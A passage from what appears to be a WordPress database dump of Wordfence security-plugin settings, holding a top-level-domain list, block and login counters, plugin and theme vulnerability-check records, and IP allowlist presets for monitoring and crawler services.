ia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','1005','yes'),('totalAlertsSent','109','yes'),('totalIPsBlocked','984','yes'),('totalIPsLocked','106','yes'),('totalLoginHits','11284','yes'),('totalLogins','2','yes'),('totalScansRun','76','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','1','yes'),('vulnerabilities_plugin','a:7:{i:0;a:5:{s:4:\"slug\";s:7:\"akismet\";s:9:\"toVersion\";s:6:\"4.1.10\";s:11:\"fromVersion\";s:5:\"4.1.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:9:\"toVersion\";s:5:\"4.4.9\";s:11:\"fromVersion\";s:5:\"4.4.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:17:\"disable-gutenberg\";s:9:\"toVersion\";s:5:\"2.5.1\";s:11:\"fromVersion\";s:3:\"2.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:5:{s:4:\"slug\";s:11:\"redirection\";s:9:\"toVersion\";s:5:\"5.1.3\";s:11:\"fromVersion\";s:3:\"3.2\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/4209cf3b-1778-4ac2-b778-3bd5526b681d\";}i:4;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:9:\"toVersion\";s:5:\"7.5.5\";s:11:\"fromVersion\";s:5:\"7.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:5:{s:4:\"slug\";s:9:\"wp-cerber\";s:9:\"toVersion\";s:5:\"8.9.3\";s:11:\"fromVersion\";s:5:\"8.8.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}i:6;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:8:{i:0;a:4:{s:4:\"slug\";s:11:\"regina-lite\";s:9:\"toVersion\";s:5:\"2.0.7\";s:11:\"fromVersion\";s:5:\"2.0.0\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:10:\"skt-toothy\";s:9:\"toVersion\";s:3:\"1.6\";s:11:\"fromVersion\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:14:\"twentynineteen\";s:9:\"toVersion\";s:3:\"2.1\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}i:3;a:4:{s:4:\"slug\";s:12:\"twentytwenty\";s:9:\"toVersion\";s:3:\"1.8\";s:11:\"fromVersion\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}i:4;a:4:{s:4:\"slug\";s:15:\"twentytwentyone\";s:9:\"toVersion\";s:3:\"1.4\";s:11:\"fromVersion\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}i:5;a:4:{s:4:\"slug\";s:11:\"vision-lite\";s:9:\"toVersion\";s:5:\"1.1.6\";s:11:\"fromVersion\";s:5:\"1.1.3\";s:10:\"vulnerable\";b:0;}i:6;a:4:{s:4:\"slug\";s:6:\"weblog\";s:9:\"toVersion\";s:5:\"3.0.4\";s:11:\"fromVersion\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;}i:7;a:4:{s:4:\"slug\";s:12:\"wp-barrister\";s:9:\"toVersion\";s:5:\"2.3.1\";s:11:\"fromVersion\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','18874368','no'),('wfScanStartVersion','5.7.2','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1629717529;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23